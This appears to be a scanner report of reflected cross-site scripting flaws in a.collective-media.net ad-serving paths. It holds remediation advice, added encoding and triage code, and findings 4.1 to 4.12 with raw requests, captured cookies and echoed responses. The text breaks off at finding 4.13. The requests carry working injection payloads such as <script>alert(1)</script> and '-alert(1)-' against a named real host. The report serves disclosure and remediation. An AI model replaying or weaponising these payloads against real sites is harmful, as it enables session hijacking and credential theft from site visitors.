Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses.

First, input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

Second, user input should be encoded for the context it is written into at every point where it is copied into application responses. In an HTML text context, all HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc). In a JavaScript string context, quote characters, backslashes and < must be escaped so that the input cannot terminate the string literal or the enclosing script element.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
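
The following is an added example, not code from the scanner or from any of the scanned sites. It reproduces the two reflection patterns recorded in section 4 of this report (a request path echoed verbatim into a text/html 404 body, as in 4.1, and a URL path segment concatenated into a single-quoted string inside document.write, as in 4.11), each beside a hardened version that applies the two layers above: an allow-list check on arrival and context-specific encoding at the point of output. The function names htmlEncode, jsStringEncode, renderNotFound, renderAdTag and breaksOut, the allow-list pattern, and the simplified ad-tag template are assumptions for illustration; the payload inputs are the ones recorded in findings 4.1 and 4.11.

```javascript
// Added example (not the scanned site's handler): vulnerable and hardened
// output for the two reflection contexts seen in this report.

// Encoding for the HTML text context. Every character outside a conservative
// allow-list becomes a numeric entity, so < > " ' = & and / can never be read
// as markup. Encoding more than strictly necessary is harmless here.
function htmlEncode(s) {
  return String(s).replace(/[^A-Za-z0-9 .,_-]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Encoding for a JavaScript string literal: everything outside [A-Za-z0-9]
// becomes \xHH or \uHHHH, so no quote or backslash can end the literal and
// the sequence </script> cannot appear in the output.
function jsStringEncode(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Pattern from 4.1: the request path echoed unmodified into a text/html
// 404 body (reproduces the observed output, not the real handler).
function renderNotFoundVulnerable(path) {
  return `unknown path ${path}`;
}

// Hardened 404 body: same message, path encoded for the HTML text context.
function renderNotFound(path) {
  return `unknown path ${htmlEncode(path)}`;
}

// Pattern from 4.11: a path segment concatenated into a single-quoted string
// inside document.write(...), as in the captured application/x-javascript body.
function renderAdTagVulnerable(segment) {
  return "document.write('<scr'+'ipt src=\"http://a.collective-media.net/cmadj/" +
    segment + "/ATF;net=bzo;'+ifr+'\">');";
}

// Hardened ad tag. Layer 1: validate on arrival against an assumed allow-list
// of what an ad-tag name may contain; anything else is rejected (null), not
// cleaned up. Layer 2: encode for the JavaScript string context at the point
// of output, so a later relaxation of the allow-list still cannot break out.
function renderAdTag(segment) {
  if (!/^[A-Za-z0-9._-]{1,64}$/.test(segment)) return null;
  return "document.write('<scr'+'ipt src=\"http://a.collective-media.net/cmadj/" +
    jsStringEncode(segment) + "/ATF;net=bzo;'+ifr+'\">');";
}

// Does a breakout marker from the payload survive into the output unchanged?
function breaksOut(output, marker) {
  return output.includes(marker);
}

// Constructed inputs: the payloads recorded in findings 4.1 and 4.11.
const htmlPayload = '/add1f99<script>alert(1)</script>c1a752a6f1e/cm.quadbostonherald/';
const jsPayload = "bzo.847.CD39C4357e3e1'-alert(1)-'04a355a249b";

// Summarise both pairs: true means the breakout sequence reached the output.
function demo() {
  const adTag = renderAdTag(jsPayload);
  return {
    notFoundVulnerable: breaksOut(renderNotFoundVulnerable(htmlPayload), '<script>'),
    notFoundHardened: breaksOut(renderNotFound(htmlPayload), '<script>'),
    adTagVulnerable: breaksOut(renderAdTagVulnerable(jsPayload), "'-alert(1)-'"),
    adTagHardened: adTag === null ? false : breaksOut(adTag, "'-alert(1)-'"),
    adTagRejected: adTag === null,
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

The order of the two layers matters: validation rejects the recorded payload outright because of the quote and parentheses, and encoding is what protects the output if a legitimate tag name ever needs a character the allow-list does not cover. Encoding on its own is also enough for the 404 body, because the path there is only ever displayed, never interpreted.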


4.1. http://a.collective-media.net/ad/cm.quadbostonherald/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.quadbostonherald/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1f99<script>alert(1)</script>c1a752a6f1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add1f99<script>alert(1)</script>c1a752a6f1e/cm.quadbostonherald/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 78
Date: Sat, 29 Jan 2011 05:19:59 GMT
Connection: close

unknown path /add1f99<script>alert(1)</script>c1a752a6f1e/cm.quadbostonherald/

4.2. http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4883<script>alert(1)</script>33df23666f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ade4883<script>alert(1)</script>33df23666f7/q1.bosherald/be_ent HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 77
Date: Sat, 29 Jan 2011 05:20:04 GMT
Connection: close

unknown path /ade4883<script>alert(1)</script>33df23666f7/q1.bosherald/be_ent

4.3. http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /ad/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3829b(a)65fe352989c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad3829b(a)65fe352989c/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 313
Date: Sat, 29 Jan 2011 05:19:59 GMT
Connection: close

unknown path /ad3829b(a)65fe352989c/q1.bosherald/be_ent;cmw=owl;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x
...[SNIP]...

4.4. http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b71ea<script>alert(1)</script>43f8c2f9671 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adb71ea<script>alert(1)</script>43f8c2f9671/q1.bosherald/be_ent_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 80
Date: Sat, 29 Jan 2011 05:19:45 GMT
Connection: close

unknown path /adb71ea<script>alert(1)</script>43f8c2f9671/q1.bosherald/be_ent_fr

4.5. http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /ad/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 79356(a)67f94803f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad79356(a)67f94803f26/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 314
Date: Sat, 29 Jan 2011 05:19:51 GMT
Connection: close

unknown path /ad79356(a)67f94803f26/q1.bosherald/be_ent_fr;cmw=owl;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP30
...[SNIP]...

4.6. http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /ad/q1.bosherald/ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 35919(a)41f172dc609 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad35919(a)41f172dc609/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 309
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 05:19:58 GMT
Connection: close

unknown path /ad35919(a)41f172dc609/q1.bosherald/ent;cmw=owl;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_
...[SNIP]...

4.7. http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/q1.bosherald/ent

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45058<script>alert(1)</script>44ffe6e3b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad45058<script>alert(1)</script>44ffe6e3b74/q1.bosherald/ent HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 74
Date: Sat, 29 Jan 2011 05:19:55 GMT
Connection: close

unknown path /ad45058<script>alert(1)</script>44ffe6e3b74/q1.bosherald/ent

4.8. http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /ad/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5079d(a)499f55b813b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad5079d(a)499f55b813b/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 310
Date: Sat, 29 Jan 2011 05:19:58 GMT
Connection: close

unknown path /ad5079d(a)499f55b813b/q1.bosherald/ent_fr;cmw=owl;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250
...[SNIP]...

4.9. http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aaa75<script>alert(1)</script>881ebad7688 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adaaa75<script>alert(1)</script>881ebad7688/q1.bosherald/ent_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 77
Date: Sat, 29 Jan 2011 05:19:51 GMT
Connection: close

unknown path /adaaa75<script>alert(1)</script>881ebad7688/q1.bosherald/ent_fr

4.10. http://a.collective-media.net/ad/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37e8f<script>alert(1)</script>f4b54c2c5da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad37e8f<script>alert(1)</script>f4b54c2c5da/uol.collective/ColeHaan_MM_Openness_CMN_13109 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 103
Date: Sat, 29 Jan 2011 05:19:56 GMT
Connection: close

unknown path /ad37e8f<script>alert(1)</script>f4b54c2c5da/uol.collective/ColeHaan_MM_Openness_CMN_13109

4.11. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e3e1'-alert(1)-'04a355a249b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.847.CD39C4357e3e1'-alert(1)-'04a355a249b/ATF HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 423
Date: Fri, 28 Jan 2011 16:37:19 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 16:37:19 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.847.CD39C4357e3e1'-alert(1)-'04a355a249b/ATF;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
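
The following is an added example, not part of the scanner report: a small triage helper that locates a reflected payload in a captured response and classifies the context it landed in, which is the manual check a reviewer wants before accepting a scanner's label, in particular for the Firm-confidence findings 4.3, 4.5, 4.6 and 4.8, whose Issue detail names an unquoted JavaScript expression while the captured response is the same text/html "unknown path" 404 body as in 4.2. The function names and the classification strings are assumptions for illustration; the three sample responses are copied from findings 4.2, 4.3 and 4.11 (4.3 abbreviated where the report itself shows ...[SNIP]...), and the fourth sample is constructed to show the inline-script case.

```javascript
// Added example (not the scanner's logic): classify where a reflected payload
// lands in a captured HTTP response body.

// Quote state of JavaScript source at `index`: "'", '"' or null. Heuristic:
// handles single- and double-quoted literals with backslash escapes only; it
// does not understand comments, regex or template literals, which is enough
// for the one-line ad tags in this report but not for arbitrary scripts.
function jsQuoteStateAt(src, index) {
  let quote = null;
  for (let i = 0; i < index; i++) {
    const c = src[i];
    if (quote === null) {
      if (c === "'" || c === '"') quote = c;
    } else if (c === '\\') {
      i++; // skip the escaped character
    } else if (c === quote) {
      quote = null;
    }
  }
  return quote;
}

// Is `index` inside a <script>...</script> element of an HTML body?
function insideScriptElement(html, index) {
  const before = html.slice(0, index).toLowerCase();
  const opens = (before.match(/<script\b/g) || []).length;
  const closes = (before.match(/<\/script\s*>/g) || []).length;
  return opens > closes;
}

// Offset just after the '>' of the innermost <script ...> tag before `index`.
function scriptStart(html, index) {
  const before = html.slice(0, index);
  const open = before.toLowerCase().lastIndexOf('<script');
  const close = open < 0 ? -1 : before.indexOf('>', open);
  return close < 0 ? 0 : close + 1;
}

// Is `index` inside an HTML tag, i.e. after a '<' that has not been closed?
function insideTag(html, index) {
  const before = html.slice(0, index);
  return before.lastIndexOf('<') > before.lastIndexOf('>');
}

const SCRIPT_TYPES = ['application/x-javascript', 'application/javascript', 'text/javascript'];

function classifyReflection(contentType, body, payload) {
  const index = body.indexOf(payload);
  if (index < 0) return 'not reflected';
  const type = contentType.toLowerCase().split(';')[0].trim();
  const wholeBodyIsScript = SCRIPT_TYPES.includes(type);
  if (wholeBodyIsScript || insideScriptElement(body, index)) {
    // For HTML, scan only the current <script> element, not the whole page.
    const start = wholeBodyIsScript ? 0 : scriptStart(body, index);
    const quote = jsQuoteStateAt(body.slice(start), index - start);
    if (quote === "'") return 'JavaScript string (single-quoted)';
    if (quote === '"') return 'JavaScript string (double-quoted)';
    return 'JavaScript expression (unquoted)';
  }
  if (insideTag(body, index)) return 'HTML tag attribute';
  return 'HTML text between tags';
}

// Samples: the first three are copied from this report; the last is constructed.
const samples = [
  { id: '4.2', contentType: 'text/html',
    payload: 'e4883<script>alert(1)</script>33df23666f7',
    body: 'unknown path /ade4883<script>alert(1)</script>33df23666f7/q1.bosherald/be_ent' },
  { id: '4.3', contentType: 'text/html',
    payload: '3829b(a)65fe352989c',
    body: 'unknown path /ad3829b(a)65fe352989c/q1.bosherald/be_ent;cmw=owl;sz=300x250;' },
  { id: '4.11', contentType: 'application/x-javascript',
    payload: "7e3e1'-alert(1)-'04a355a249b",
    body: "var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;\n" +
          "var ifr = (self==top ? '' : 'env=ifr;');\n" +
          "document.write('<scr'+'ipt language=\"javascript\" src=\"http://a.collective-media.net/cmadj/bzo.847.CD39C4357e3e1'-alert(1)-'04a355a249b/ATF;net=bzo;'+ifr+'\">');" },
  { id: 'constructed', contentType: 'text/html',
    payload: 'xyz123',
    body: '<html><script>var q = "a"; var n = xyz123;</script><p>xyz</p></html>' },
];

function triage(list = samples) {
  return list.map((s) => ({ id: s.id, context: classifyReflection(s.contentType, s.body, s.payload) }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of triage()) console.log(`${r.id}: ${r.context}`);
}
```

Run over the captured bodies, 4.2 and 4.3 classify identically as HTML text in a text/html 404 body, while 4.11 lands inside a single-quoted string in an application/x-javascript response. The response captured for 4.3 therefore does not by itself show the script context its Issue detail names, which is consistent with the scanner's Firm rather than Certain confidence and with its failure to find a full proof of concept; a reviewer should treat 4.3, 4.5, 4.6 and 4.8 as the same HTML-text reflection as 4.2, 4.4, 4.7 and 4.9 unless a script context is found by hand.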

4.12. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6bfb'-alert(1)-'e42c63df571 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.847.CD39C435/ATFc6bfb'-alert(1)-'e42c63df571 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 423
Date: Fri, 28 Jan 2011 16:37:19 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 16:37:19 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATFc6bfb'-alert(1)-'e42c63df571;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.847.CD39C435/ATF

Issue detail

